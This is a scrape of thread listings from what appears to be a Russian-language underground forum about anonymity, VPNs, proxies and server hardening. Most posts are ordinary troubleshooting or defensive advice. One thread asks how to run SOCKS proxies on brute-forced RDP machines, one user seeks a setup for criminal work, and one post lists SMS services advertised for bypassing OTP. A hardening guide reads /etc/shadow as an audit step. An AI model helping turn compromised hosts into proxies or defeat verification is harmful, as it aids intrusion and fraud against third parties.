Last Post: 2022-05-15T13:12:59+0000
Author: simplestop
Replies: 2 Views: 235

Приветствую всех! Появилась необходимость в замене VPS в пользу RDS. Хостер не предоставляет услуги установки оси и дальнейшего проброса рдп, а предоставляет только доступ по HTML5, к железу. Самостоятельно поставил Debian 10, софт для проброса рдп - xrpd, vpn- wireguard, затестил рдп без впн все работает как часы, а когда подрубаю впн - по рдп уже не конектит, если с рдп натягиваю впн то просто обрубается конект
Знатоки подскажите решаемая это проблема и как?

Поднятие прокси сервера на RDP Windows

ID: 676533bbb4103b69df371aa4
Thread ID: 74569
Created: 2022-10-22T07:36:03+0000
Last Post: 2022-10-22T09:52:30+0000
Author: Bronx Wilde
Replies: 2 Views: 234

Задался таким вопросом, в интернете особо толкового решения не нашел, может что то упустил.

Суть вопроса:
Есть множество брут RDP, хочется узнать о возможности поднятия своих SOCKS на них, для дальнейшего использования этих прокси.

Всё - таки QUEMU или VBox?

ID: 676533bbb4103b69df371b41
Thread ID: 63150
Created: 2022-02-18T10:53:12+0000
Last Post: 2022-02-18T12:00:01+0000
Author: T3atral
Replies: 2 Views: 233

Читал обсуждения по безопасности, по виртуалкам, но в итоге-то есть какое-то существенное отличие?

Вопрос о JonDonym

ID: 676533bbb4103b69df371b9a
Thread ID: 57390
Created: 2021-10-05T11:55:06+0000
Last Post: 2021-10-06T00:10:38+0000
Author: Buki
Replies: 3 Views: 233

Почему JonDonym настолько менее известный инструмент для обеспечения аноноимности/обхода цензуры, нежели Tor? Он имеет какие-то значительные минусы по сравнению с Tor, либо так сложилось исторически?

Бесплатный трастовый прокси от Google

ID: 676533bbb4103b69df371ab4
Thread ID: 73380
Created: 2022-09-19T10:37:05+0000
Last Post: 2022-09-27T10:42:42+0000
Author: dexter3
Replies: 1 Views: 231

На zennolab финишировал 9-й конкурс шаблонов.
Не пропустите шаблон для ZP - Бесплатный трастовый прокси от Google и мини- парсер от меня.
Читайте статью и забирайте шаблон здесь - https://link.sv/sYY6iO

Сервис хранения заметок

ID: 676533bbb4103b69df371b74
Thread ID: 59978
Created: 2021-12-12T08:59:45+0000
Last Post: 2021-12-13T05:35:46+0000
Author: wildo
Replies: 2 Views: 231

Интересует шифрованный сервис хранения паролей, заметок, прочей важной инфы.
Кто использует что-то подобное?

temp sms reveive

ID: 676533bbb4103b69df371b9d
Thread ID: 57374
Created: 2021-10-05T00:10:52+0000
Last Post: 2021-10-05T00:10:52+0000
Author: wx69wx
Replies: 0 Views: 230

![www.receiveasms.com](/proxy.php?image=https%3A%2F%2Fwww.receiveasms.com%2Fimages%2Fheaders%2Fanonymous- logo.png%2Fog-image.jpg&hash=020222e75e6601ad8423faec61edeb0e&return_error=1)

ReceiveaSMS.COM

Get your text messages online and stay anonymous.

www.receiveasms.com

https://smsreceivefree.com/

[ Free Receive SMS Online - GetFreeSMSNumber

](https://getfreesmsnumber.com/)

GetFreeSMSNumber.com is free Online SMS Services, 300+ free virtual temporary phone numbers for receive verified SMS Code online,Including Belgium, China, Korea, US, India, Russia, Uk, Receive sms free with no register, You can receive sms verification service online likes...

getfreesmsnumber.com

![sms-online.co](/proxy.php?image=https%3A%2F%2Fcdn.sms- online.co%2Fimg%2Fbackgrounds%2Ffacebook.png&hash=35f799a2995601b173b0009f2b334d35&return_error=1)

[ Receive SMS online for Free - without a Phone or Registration

](https://sms-online.co/receive-free-sms)

sms-online.co is a free service to receive SMS online. It works from all countries. Use it for Facebook, Telegram, WeChat, VK, PayPal, AliPay and more

![sms-online.co](/proxy.php?image=https%3A%2F%2Fcdn.sms- online.co%2Fimg%2Ffavicons%2Ffavicon-16x16.png&hash=5f23559f28ab0411dc3bc42cf50837d3&return_error=1) sms-online.co

[ Receive SMS online - France, Germany, Romania, Spain, United Kingdom,

USA, and more ... ](http://sms-receive.net/)

Sms-receive.net is free service for receiving SMS online in: United Kingdom, Germany, United States,France

![sms-receive.net](/proxy.php?image=http%3A%2F%2Fsms- receive.net%2Ffavicon.ico&hash=418b1dbcf834c4f6d77dc556718990fa&return_error=1) sms-receive.net

Receive SMS Online | Free SMS | SMS Online

Receive SMS Online for FREE and with NO Registration, Verify facebook, whatsapp, LINE, Yahoo, Vk.com, Viber, LINE, Liqpay, WeChat, HotSpots, CoinsUP, Chatroulette, Gumtree, Microsoft, Visa QIWI Wallet, Weebly, Uber, Global Call, Chikka, Localbitcoins, Premiumize.Me, Voxox, and more.

www.receivesmsonline.net

Receive Free SMS Online

Free service for receive sms to real numbers for registration on any site requiring sms confirmation.

7sim.net

[ Receive SMS Online For Free - US,UK,Austria,Sweden,BELGIUM Free Virtual

Numbers ](https://hs3x.com/)

We provide Receive SMS Online services,you can use a Virtual Numbers to Receive SMS with Multiple countries include US,UK,Austria,Sweden,BELGIUM

hs3x.com

[ Receive SMS Online Free text,USA,UK,Germany,France,Italy

](http://receivefreesms.com/)

Receive SMS online for FREE. receive text with Virtual Phone Numbers,UK,United States,France,Germany,Brazil,China,Hong kong,india.

receivefreesms.com

Receive Free SMS | Receive SMS Online

receivefreesms.net

Receive SMS Online

Just use one of the country listed below, then select one of the numbers and you can see the SMS that reach that number.We have virtual numbers from United States, United Kingdom, Sweden, Canada and more.

receivesmsonline.in

https://receive-sms-online.com/

Receive any SMS from any sender

Real mobile numbers to receive SMS online from online service or any other sender.

www.groovl.com

https://www.smsver.com/

Receive SMS Online | Voice call verification | SMS to email - SELLAITE

Receive SMS online and Voice call messages for free verification via Sellaite service.

sms.sellaite.com

[ Send Free SMS - Text Messaging by SendSMSnow

](https://www.sendsmsnow.com/)

Send Free SMS worldwide and communicate with your friends and family. SendSMSnow offers free sms, 2-way messaging and groups for text messaging

www.sendsmsnow.com

Receive SMS

Receive SMS with our Virtual Mobile Numbers from different corners of the world

www.proovl.com

![www.pinger.com](/proxy.php?image=https%3A%2F%2Fwww.pinger.com%2Fwp- content%2Fuploads%2F2020%2F02%2FLogo-White- BG-08.png&hash=9439207cd18c95817b7fc07bface6867&return_error=1)

Developer of Sideline and TextFree | Pinger

Pinger makes the mobile apps Sideline and TextFree to provide an alternative to traditional carrier plans and business phone systems for millions of users.

![www.pinger.com](/proxy.php?image=https%3A%2F%2Fwww.pinger.com%2Fwp- content%2Fuploads%2F2019%2F01%2Fcropped- pinger_new_trans-150x150.png&hash=586429fc8a56477e35e43bf2a988d9ba&return_error=1) www.pinger.com

Free Online Phone | Receive SMS Online

www.freeonlinephone.org

Online SMS verification service | Receive SMS online

Buy virtual number for SMS verification from 0,014$. Receive SMS online and bypass OTP in Amazon, Discord, Naver, Instagram, WhatsApp, Google!

5sim.net

Virtual Mobile Number Buy with cheap price | For Any Verification

Virtual Mobile Number and Landline Number Selling Company And Also Sell Bulk SMS For Sms Send In Worldwide.

www.skycallbd.com

Бесплатные номера для смс

Сервис СМС активаций. Получить СМС онлайн бесплатно на SMSGET. Номера от 18.08.2023, 16:02

smsget.net

https://virtty.com/fa

![www.textanywhere.com](/proxy.php?image=https%3A%2F%2Fwww.textanywhere.com%2Fwp- content%2Fuploads%2Fimages%2Ftextanywhere%2Fwebsite%2FTA-Home- Hero.png&hash=f03ceb054b662d16a47604fbc119736a&return_error=1)

TextAnywhere | UK Leading SMS Marketing | Try for Free

Send, Receive & Reply to SMS | Deliver Offers, Notifications, Auto Replies & more | Reliable & Low Cost Bulk SMS Sender | Try for free now

www.textanywhere.com

[ temp-mails.com - Ressources et information concernant temp mails

Resources and Information. ](https://www.temp-mails.com/)

temp-mails.com réunit des informations et annonces. Nous espérons que vous y trouverez les informations que vous recherchez !

www.temp-mails.com

Receive Free SMS Online | Verification for free | Virtual sms number |

Receive Free SMS Online. Our Service receive free sms on internet, You can Receive SMS to bypass code with our Virtual numbers to verify sms and receive sms verification.

receivesmsonline.me

Receive SMS Online | NO Registration | Free sms receive

Receive SMS Online without registration, Free sms verification. USA, Uk, Brazil, India, Belgium, Indonesia and more. Disposable sms numbers to receive sms online.

freereceivesmsonline.com

Números de teléfono GRATUITOS para recibir mensajes online | mytrashmobile.com

Usa uno de nuestros números GRATUITOS para recibir mensajes de texto (SMS) online sin tener que utilizar una tarjeta SIM o un teléfono personal

![es.mytrashmobile.com](/proxy.php?image=https%3A%2F%2Fstatic.mytrashmobile.com%2Fassets%2Fimages%2Ficons%2Ffavicons%2Fandroid- icon-192x192.png&hash=ec336f50453937f56417ed678d6918c8&return_error=1) es.mytrashmobile.com

Как обезопасить ваш сервер Linux

ID: 676533bbb4103b69df371a5d
Thread ID: 88478
Created: 2023-05-20T22:02:54+0000
Last Post: 2023-05-20T22:02:54+0000
Author: DedJhones
Replies: 0 Views: 230

Статья взята из открытого доступа

Как обезопасить ваш сервер Linux

1. Безопасный удаленный доступ

Иногда мы получаем доступ к нашему серверу удаленными методами и если это никак не защищено, мы можем подвергнуть наш сервер опасности.

Опциями OpenSSH управляют через конфигурационный файл /etc/ssh/sshd_config.

a. Отключите метод аутентификации по паролю SSH и включите метод

аутентификации с открытым ключом

Измените значения ChallengeResponseAuthentication и PasswordAuthentication на ‘no’, чтобы деактивировать метод пароля.

PasswordAuthentication no ChallengeResponseAuthentication no

Авторизация по открытому ключу:

RSAAuthentication yes PubkeyAuthentication yes

Теперь вы можете сгенерировать новую пару ключей:

# ssh-keygen -t rsa

b. Отключите прямой вход root’a в систему

Риск безопасности существует, если позволен вход пользователя root непосредственно к серверу.

Вместо этого вы должны войти в систему под вашей учетной записью и затем сделать su – чтобы войти в систему как root.

Таким образом, вы должны изменить PermitRootLogin ‘yes’ на PermitRootLogin ‘no’.

PermitRootLogin no

c. Измените порт по умолчанию для SSH (например: 8500)

port 8500

2. Пароль на загрузчик GRUB

Защищая загрузчик мы можем предотвратить доступ к однопользовательскому режиму, в котором пользователь входит в систему автоматически как root.

Для Debian:

# grub-mkpasswd-pbkdf2
Для Centos:

# grub2-mkpasswd-pbkdf2

3. Порты сети

После конфигурирования сетевых служб важно обратить внимание, которое порты на самом деле прослушиваются на сетевых интерфейсах системы. Любые открытые порты могут быть доказательством проникновения.

# nmap -sT -O localhost

Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 23:13 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000061s latency).
Other addresses for localhost (not scanned): 127.0.0.1
rDNS record for 127.0.0.1: centos-01
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs

Click to expand...

Чтобы перечислить все открытые порты и связанные программы используйте команду ниже:

# netstat -tulpn

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1/systemd
tcp 0 0 0.0.0.0:20048 0.0.0.0:* LISTEN

Click to expand...

4. Снижение прав

Сузьте права для системных файлов и папок, чтобы ограничить риски.

Code:Copy to clipboard

# chmod 700 /root # chmod 700 /var/log/audit # chmod 740 /etc/rc.d/init.d/iptables # chmod 740 /sbin/iptables # chmod -R 700 /etc/skel # chmod 600 /etc/rsyslog.conf # chmod 640 /etc/security/access.conf # chmod 600 /etc/sysctl.conf

5. Проверьте аккаунты на пустые пароли

Любая учетная запись, имеющая пустой пароль, означает, что она открыта для несанкционированного доступа в сети, подрывая безопасность сервера Linux.

Чтобы проверить наличие пустых паролей используйте команду ниже:

# cat /etc/shadow | awk -F: '($2==""){print $1}' paul
Заблокируйте пустые пароли:

# passwd -l paul

Locking password for user paul.
passwd: Success

Click to expand...

6. Настройте параметры ядра

Отредактируйте файл /etc/sysctl.conf, чтобы оптимизировать параметры ядра.

Sysctl – команда, используемая, чтобы изменить параметры ядра во время выполнения в терминале.

# sysctl -a

# sysctl -A

# sysctl net.ipv4.conf.all.rp_filter
Чтобы подгрузить настройки введите:

# sysctl -p
Скопируйте следующий контент в файл /etc/sysctl.conf:

![](/proxy.php?image=https%3A%2F%2Fitsecforu.ru%2Fwp- content%2Fuploads%2F2017%2F09%2Fsysctl.conf_-1024x501-300x147.png&hash=df3367dc423362238733dd2ddf2fb435)

Turn on execshield

kernel.exec-shield=1
kernel.randomize_va_space=1

Enable IP spoofing protection

net.ipv4.conf.all.rp_filter=1

Disable IP source routing

net.ipv4.conf.all.accept_source_route=0

Ignoring broadcasts request

net.ipv4.icmp_echo_ignore_broadcasts=1
net.ipv4.icmp_ignore_bogus_error_messages=1

Make sure spoofed packets get logged

net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.log_martians = 1

Disable ICMP routing redirects

sysctl -w net.ipv4.conf.all.accept_redirects=0
sysctl -w net.ipv6.conf.all.accept_redirects=0
sysctl -w net.ipv4.conf.all.send_redirects=0
sysctl -w net.ipv6.conf.all.send_redirects=0

Disables the magic-sysrq key

kernel.sysrq = 0

Turn off the tcp_sack

net.ipv4.tcp_sack = 0

Turn off the tcp_timestamps

net.ipv4.tcp_timestamps = 0

Enable TCP SYN Cookie Protection

net.ipv4.tcp_syncookies = 1

Enable bad error message Protection

net.ipv4.icmp_ignore_bogus_error_responses = 1

Click to expand...

7. Отключите нежелательные службы

Вам необходимо удалить все нежелательные службы и демоны (службы, выполняющиеся в фоновом режиме) из системы, которые запускаются во время загрузки на уровне запуска 3.

# chkconfig --list | grep '3:on'

Чтобы отключить службы, выполните:
# service serviceName stop
# chkconfig serviceName off

8. Требовать аутентификацию для однопользовательского режима

При входе в однопользовательский режим рекомендуется вводить пароль root.
Откройте файл / etc / sysconfig / init и добавьте строку:
SINGLE=/sbin/sulogin

9. Улучшенная безопасность Linux (SELinux)

SELinux – это набор правил безопасности, которые определяют, какой процесс может получить доступ к файлу, каталогам, портам и т. Д.
Каждый файл, процесс, каталог и порт имеют специальную метку безопасности, называемую контекстами SELinux.
Контекст – это просто имя, которое используется политикой SELinux, чтобы определить, может ли процесс получить доступ к файлу, каталогу или порту.
По умолчанию политика не позволяет взаимодействовать, поэтому явные правила предоставляют доступ.
Если правила разрешений отсутствуют, доступ запрещен.
Команда getenforce сообщает нам, в каком режиме находится SELinux.
Мы можем изменить режим SELinux в принудительном порядке, изменив SELINUX=enforcing в /etc/sysconfig/selinux
![](/proxy.php?image=https%3A%2F%2Fitsecforu.ru%2Fwp- content%2Fuploads%2F2017%2F09%2FSELinux-1024x461-300x135.png&hash=97d141d70122478062aae084ada65bd9)
В этом файле есть три директивы, как описано ниже.

Enforcing : политика безопасности SELinux применяется.

Permissive : SELinux печатает предупреждения

Disabled : SELinux полностью отключен.

Вы можете проверить статус SELinux командой:
# sestatus

SELinux status: disabled

Сейчас мы видим статус disabled, чтобы включить применение политик безопасности, выполним команду:
# setenforce enforcing

10. Установите брандмауэр с помощью iptables

iptables – это прикладная программа, которая позволяет системному администратору настраивать таблицы, предоставленные брандмауэром ядра Linux, а также цепочки и правила, которые он хранит.

a. Закройте все нежелательные порты

# iptables -A INPUT -p tcp --dport PORT_NUMBER -j DROP

b. Заблокируйте плохие IP

# iptables -A INPUT -s IP_ADDRESS -j DROP [HEADING=3][/HEADING]

с. Блокировать подключения к сетевому интерфейсу

Чтобы заблокировать подключения с определенного IP-адреса к определенному сетевому интерфейсу, используйте команду:
# iptables -A INPUT -i <span class="highlight">ens0</span> -s 6<span class="highlight">.6.6.6</span> -j DROP

d. Список правил iptables

Вы можете увидеть все правила iptables командой
# iptables -L -n -v

![](/proxy.php?image=https%3A%2F%2Fitsecforu.ru%2Fwp- content%2Fuploads%2F2017%2F09%2Fiptables-L- n-v-1024x508-300x149.png&hash=0292067725fe229460b53099d9fa1d77)

11. Проверка файловой системы

Все файлы с битами SUID / SGID могут использоваться для вредоносных действий, когда исполняемый файл SUID / SGID имеет проблему безопасности.
Любой локальный или удаленный пользователь может использовать такой файл.

а. Определить нежелательные бинарники SUID и SGID

# find / $ -perm -4000 -o -perm -2000 $ -print
# find / -path -prune -o -type f -perm +6000 -ls

b. Определение файлов, доступных для записи

# find /dir -xdev -type d $ -perm -0002 -a ! -perm -1000 $ -print

c. Определение сиротских файлов и папок

# find /dir -xdev $ -nouser -o -nogroup $ -print

12. Держать каталог /boot как только для чтения

Ядро Linux и связанные с ним файлы находятся в каталоге / boot, который по умолчанию используется как и на чтение, так и на запись.
Изменение его на чтение снижает риск несанкционированной модификации важных загрузочных файлов.
Нам нужно отредактировать файл / etc / fstab и вставить строку ниже <
LABEL=/boot /boot ext2 defaults,ro 1 2

13. Отключить все TCP оболочки

Оболочки TCP могут обеспечить быстрый и простой способ контроля доступа к связанным с ними приложениям.
Поэтому рекомендуется блокировать все неиспользуемые приложения, а затем разрешать только те приложения, которые будут использоваться.
Например, мы заблокируем все приложения, но санкционируем ssh
# echo"ALL:ALL" >> /etc/hosts.deny

# echo "sshd:ALL" >> /etc/hosts.allow

14. Заблокируйте cronjobs для неавторизованных пользователей.

Cron используется для автоматизации заданий в определенное время.
Можно указать, кто может и не сможет выполнять задания.
Это контролируется с помощью файлов под названием /etc/cron.allow и /etc/cron.deny.
Чтобы заблокировать пользователя с помощью cron, просто добавьте имена пользователей в cron.deny и чтобы разрешите пользователю запускать cron add в файле cron.allow.
# echo ALL >> / etc / cron.deny

15. Защитите сервер от переполнения буфера

Переполнение буфера происходит тогда, когда программа или процесс пытается записать большее количество данных в блок фиксированной длины памяти или буфер, чем сам буфер, выделенный для хранения.
Важно защитить ваш сервер от этой атаки.

а. Включите ExecShield

# sysctl -w kernel.exec-shield=1

Вы также можете добавить строку ниже в /etc/sysctl.conf:
kernel.exec-shield = 1

b. Проверить / включить ASLR

Ранжирование пространства адреса – это защитная функция, которая затрудняет переполнение буфера.
# sysctl -q -n -w kernel.randomize_va_space=2

Добавьте строку ниже в /etc/sysctl.conf, если она еще не существует:
kernel.randomize_va_space = 2

Безопасность (шифрование) трафика

ID: 676533bbb4103b69df3719cc
Thread ID: 105362
Created: 2024-01-08T23:17:58+0000
Last Post: 2024-01-08T23:31:46+0000
Author: testerov
Replies: 1 Views: 229

Какой есть более безопаснее вариант шифрование траффика чем впн или тор?

Linux и блокировка исходящего траффика

ID: 676533bbb4103b69df371abc
Thread ID: 73016
Created: 2022-09-11T12:36:09+0000
Last Post: 2022-09-12T11:40:10+0000
Author: MisterNobody
Replies: 4 Views: 228

Всех приветствую! Кратко говоря: раньше сотрудничал с человеком, который помогал с настройкой ноутбука для безопасной работы, сейчас не имею с ним связи и начал разбираться во всех технических деталях сам. Возникла потребность в смене ОС для черной деятельности, но сидеть через связку Windows

Whonix не особо хочется даже при условии Disable Windows Spying
Нужна Linux с возможностью простого включения функции Disable Non Vpn Connection, так как сам вручную не умею делать конфиг, к слову человек который настраивал его мне вручную, спустя время этот конфиг "сломался" и через browserleaks DNS начал с ip VPN'a показывать и мой собственный, поэтому здесь не должно быть утечки от слова совсем. VPN который использую - Mullvad
Буду благодарен за подсказку в выборе, а так же за любые другие наставления по настройке
К слову отмечу, что благодарен всему активному коммьюнити на этом форуме, я на нем недавно и уже успел убедиться в том, что он на голову выше чем любые другие с которыми я когда-либо встречался. Всем добра, спасибо за внимание

mac на m1

ID: 676533bbb4103b69df371b33
Thread ID: 64413
Created: 2022-03-17T19:25:37+0000
Last Post: 2022-03-17T19:30:31+0000
Author: mark_mpa
Replies: 1 Views: 228

посоветуйте схемы для анонимной работы на макинтоше на проце м1.

Keenetic + socks5, need help

ID: 676533bbb4103b69df371a69
Thread ID: 86872
Created: 2023-04-29T16:32:58+0000
Last Post: 2023-04-29T16:32:58+0000
Author: michail
Replies: 0 Views: 224

Угу поделюсь. Многим чем. Никакой-такой версией не поделюсь, так как в такой среде как ЭТА, непринято (выше читайте про задержания, утюг и т.д.). Но скажу вот что. Прежде чем создавать эту тему нужно было просто набрать телефон поддержки роутера. Они гласят - нет такого!
Почему не знаю, не Пушкин. Только могу предположить. Что-бы им не предъявили за оборудование - спам. Но могу ошибаться.
Вообще носок5 вам можно установить к себе на сервер, так как это чисто программный инструмент. Если порыться по разным форумам, то везде такой вопрос задают про роутеры + носок. Но по всем форумам хорошее решение только установка кода прокси на какую-то ОС
Но вы его не зря купили! Это очень много функциональная штуковина, так что должна пригодиться. Хоть где, те же флешки качать, медиа центр и т.д.. Огромный функционал! Многие роутеры рядом не стоят.

Really good drive encryption someone could recommend | Действительно хорошее шифрование диска, кто-то может порекомендовать

ID: 676533bbb4103b69df371ac2
Thread ID: 72599
Created: 2022-09-02T16:37:16+0000
Last Post: 2022-09-04T12:36:25+0000
Author: Dreaded Launch
Replies: 8 Views: 222

Is there any good drive encryption someone could recommend to keep my drive secure?
Есть ли хорошее шифрование диска, которое кто-то может порекомендовать для обеспечения безопасности моего диска?

где взять vds под свой впн

ID: 676533bbb4103b69df371ac1
Thread ID: 72628
Created: 2022-09-03T11:50:01+0000
Last Post: 2022-09-04T16:19:47+0000
Author: asddddd
Replies: 1 Views: 221

я во всем этом новичок, хочу поднять свой впн. Нужна страна не в юрисдикции сша / европы

Обход блокировок рунета на Mikrotik.

ID: 676533bbb4103b69df371a2f
Thread ID: 92770
Created: 2023-07-12T16:35:32+0000
Last Post: 2023-08-04T11:36:22+0000
Author: ChiefOfficial
Replies: 1 Views: 220

Всех приветствую! **(Сразу извиняюсь, если залил не в ту тему, если это так, прошу перенести в правильную или сказать куда ее перекинуть и объяснить как ) **Хотелось бы поделиться своим опытом прокидки конфига антизапрета на своём роуетер. В основном будет копипаста с сайта антизапрета с небольшими добавлениями от себя.
Настройка производилась на hAP ac2 с прошивкой 7.10.
Кратко про Antizapret-Какие преимущества перед обычным VPN? Обычные VPN направляют трафик ко всем сайтам и сервисам через свои серверы, что понижает общую скорость работы интернета. АнтиЗапрет направляет трафик на свои серверы только к сайтам и сервисам, заблокированным на территории Российской Федерации, и не снижает скорость открытия других сайтов. Проще говоря, вам не придётся каждый раз включать и выключать VPN для доступа на заблокированные сайты, к тому же скорость трафика не режется. Надеюсь, статья(в большей части копипаста, конечно) будет кому-то полезна! Хочу уточнить, данный VPN не даёт вам анонимности!

Скачиваем архив с файлом конфигурации и ключами отдельными файлами по ссылке на главной странице https://antizapret.prostovpn.org/antizapret-tcp.zip 376

Распаковываем. Файл конфигурации antizapret-tcp.ovpn и ca.crt нам не понадобится

Закидываем antizapret-client-shared.crt и antizapret-client-shared.key в папку flash вашего устройства MikroTik

Добавляем сертификат и ключ в хранилище.
Для этого открываем меню System => Certificates. Во вкладке Certificates кнопка Import. В поле File name выбираем сертификат flash/antizapret-client-shared.crt и нажимаем Import. Сертификат появится в списке с флагом T (Trusted). Аналогично добавляем ключ flash/antizapret-client-shared.key. У сертификата появится ещё один флаг K (private key).

Создадим профиль для подключения.
Для этого открываем меню PPP вкладка Profiles , нажимаем плюс. Называем профиль как удобно, например profile_antizapret. Настройки оставим по-умолчанию и переходим во вкладку Scripts. В поле On Up и в On Down: копируем строку:
/ip dns cache flush
Это нужно для того, чтобы при отключении или включении VPN-подключения у вас очищался DNS-кеш.

Создаём подключение OpenVPN.
Для этого во вкладке Interface нажимаем плюс и выбираем OVPN Client.
Во вкладке General :
Name: Называем как удобно, например ovpn-antizapret
Во вкладке Dial Out :
Connect To: vpn.antizapret.prostovpn.org
Port: оставляем 1194
Mode: оставляем ip
Protocol: tcp
User: пишем любой, например user
Password: оставляем неактивным
Profile: выбираем ранее созданный profile_antizapret
Certificate: выбираем ранее добавленный antizapret-client-shared.crt_0
TLS Version: можно оставить any
Auth: оставляем sha1
Cipher: меняем на aes 128 cbc
Use Peer DNS: выставляем на exclusively , чтобы при подключении OVPN- клиента основным DNS стал полученный от Антизапрета
Галочки на Add Default Route и Don’t Add Peshed Routes не ставим.
Нажимаем Apply , сразу должно произойти подключение. Внизу Status поменяется на connected.

NAT настраиваем в зависимости от настроек домашнего интернета. У меня роутер получает настройки по DHCP от провайдера с реальным IP. Я у себя настроил вторым правилом IP => Firewall => NAT:
Вкладка General :
Chain: srcnat
Src.Address: 192.168.100.0/24 (Это пул адресов моей локальной сети, вы указываете свой)
Out. Interface: ovpn-antizapret
Вкладка Action :
Action: masquerade.
Не так давно в браузерах начали по-умолчанию включать так называемый “Безопасный DNS”. При этой включенной функции в браузере все DNS запросы будут идти в зашифрованном виде мимо вашего роутера, а значит заблокированные сайты останутся заблокированными. В таком случае нужно отключать “Безопасный DNS” в браузере, которым пользуетесь. Это касается и мобильных устройств.
Проще всего найти эту галку можно введя слово “DNS” в строке поиска в параметрах вашего браузера.

Возможные проблемы: не завелось- решения: первочередно смотреть логи, в основном своём проблема возникает из-за настройки DNS , ставьте DNS адрес 1.1.1.1 1.0.0.1 либо 1.1.1.1 9.9.9.9 Так же стоит попробовать отключить функцию Use Peer DNS.

Anti-ddos http reverse proxy

ID: 676533bbb4103b69df371986
Thread ID: 111398
Created: 2024-03-27T07:15:52+0000
Last Post: 2024-03-27T07:15:52+0000
Author: Dastardy
Replies: 0 Views: 220

Hey people of XSS,
Baloo Proxy is a lightweight anti-ddos proxy that has many many features.

Server Setup

To start, download the [URL='https://github.com/41Baloo/balooProxy/releases']latest version of balooProxy[/URL] balooProxy or compile it from source.
`If you already have a config.json drag it in the same folder in your server as the main you downloaded/compiled. If you do not, simply start balooProxy by running ./main and answer the questions the proxy asks you. After you answered those questions stop the proxy with ctrl + c.`
You can run the proxy as a [URL='https://abhinand05.medium.com/run-any- executable-as-systemd-service-in-linux-21298674f66f']service[/URL] or inside of a screen. To run the proxy inside a screen on ubuntu/debian first run apt update. After that is done install screen by running apt install screen and follow its installation process. To start running the proxy inside of a screen run screen -S balooProxy. This will put you inside a screen, making sure the proxy keeps running even when you log out of ssh. Now just start the proxy inside the screen by running ./main (make sure the proxy isnt running anywhere else already) and quit the screen by pressing ctrl + a + d. You can always reopen the screen by running screen -d -r
-----------------------------------

Features

TLS-Fingerprinting

TLS Fingerprinting opens a whole new world of possibilities to defend against malicious attacks.

On one hand you can use tls fingerprinting to whitelist specific fingerprints, take for example seo bots, blacklist unwanted fingerprints, like for example wordpress exploit crawlers, ratelimit attackers that use proxies to change their ips or just simply gain more information about a visitor

Staged DDoS-Mitigation

balooProxy comes with 3 distinct challenges, in order to defend against bots/ddos attacks effectively, whilst effecting an actual users experience as little as possible. In order to archive that, balooProxy starts with the "weakest" and least notable challenge and automatically changes them when it detects one of them is being bypassed

Cookie Challenge

The cookie challenge is completely invisible and supported by every webbrowser, aswell as most http libraries. It is an effective method to defend against simple ddos attacks

Invisible JS Challenge

The invisible js challenge allows you to reliably block slightly more advanced bots while impacting the user experience as little as possible

Custom Captcha

The custom captcha should be your last resort or be used to protect especially weak webpages.
[URL='https://camo.githubusercontent.com/ed679b32e9511613f90514e21262a2ce8c2ab6ac95fb625cf4dc5fb23b4fc4d8/68747470733a2f2f63646e2e646973636f72646170702e636f6d2f6174746163686d656e74732f3834373532303536353630363631333034322f313036313736343731353537373039383235302f696d6167652e706e67'][IMG alt="Custom Captcha"]https://camo.githubusercontent.com/ed679b32e9511613f90514e21262a2ce8c2ab6ac95fb625cf4dc5fb23b4fc4d8/68747470733a2f2f63646e2e646973636f72646170702e636f6d2f6174746163686d656e74732f3834373532303536353630363631333034322f313036313736343731353537373039383235302f696d6167652e706e67[/IMG][/URL]

Lightweight

balooProxy tries to be as lightweight as possible, in order to run smoothly for everyone. Everything has its limits tho.

Cloudflare Mode

Not everyone can afford expensive servers, aswell as a global cdn and this is fine. That's why balooProxy supports being used along with cloudflare, although this comes at the cost of a few features, like tls fingerprinting.

link to baloo proxy:
https://github.com/41Baloo/balooProxy

Наружное наблюдение

ID: 676533bbb4103b69df371b55
Thread ID: 61924
Created: 2022-01-24T18:14:20+0000
Last Post: 2022-01-25T05:40:41+0000
Author: Konti Bergman
Replies: 1 Views: 218

Собственно топика на тему сабжа не нашел.
Интересен практический опыт определения, основные триггеры etc..
Если кто-то знает какие-то полезные материалы и поделится будет круто.
думаю многим будет полезно

Run Tor with SSH

ID: 676533bbb4103b69df371af4
Thread ID: 70213
Created: 2022-07-17T01:26:05+0000
Last Post: 2022-07-17T15:41:24+0000
Author: Nyrid
Replies: 4 Views: 218

I am newbie with some experience also user of arch linux so when i run "sudo tor" to open socks and run my hidden service with apache/nginx ( I use sudo and I think its can be dangerous )
many times I was try use docker and run "hidden service over dockler" but many times i was failed

also I follow guide to run "hidden service" in chroot but again not work
can someone advice me and tell its dangerous run "hidden service" with sudo ?

Unique Typing Print - Text Analysis

ID: 676533bbb4103b69df371ba7
Thread ID: 56475
Created: 2021-09-09T14:00:11+0000
Last Post: 2021-09-09T18:24:33+0000
Author: build_ext
Replies: 4 Views: 217

I have come across a proprietary piece of software that seems to be able to accurately determine who is linked to a specific block of text. This is quite concerning!

It seems to be able to link to a database of unique and previously collected blocks of text with identities attached. It seems anyone running this software will collect large blocks of texts of suspects posting online, whether that is FB, Forums, Twitter etc. and then hold this text within the database which will then (in the future) be linked to a physical, real world, identity.

It appears, just like a fingerprint, we all have a unique typing print (fingerprints are not 100% unique), we all have a unique way of structuring sentences, the syntax, the grammar, the wording, the spelling and so on. It seems this software keeps tabs on who is linked to each typing print, so if a particular individual has his/her real identity identified then that individual will forever be able to be tracked online as they (the people who own the software) can simply run blocks of written text through the software to see if there is a previous known match and if there is then a potential visit is made if what they are saying is "undesirable", if there is no match then the text will more than likely be added to the database for a future identification.

---------------------------------------------------------------------------------------------------------------------------------------------

Я наткнулся на запатентованную часть программного обеспечения, которая, похоже, способна точно определить, кто связан с определенным блоком текста. Это весьма тревожно!

Похоже, он может ссылаться на базу данных уникальных и ранее собранных блоков текста с прикрепленными идентификаторами. Похоже, что любой, кто использует это программное обеспечение, будет собирать большие блоки текстов подозреваемых, размещаемых в Интернете, будь то FB, форумы, Twitter и т. Д., А затем хранить этот текст в базе данных, которая затем (в будущем) будет связана с физическим, реальным миром, идентичностью.

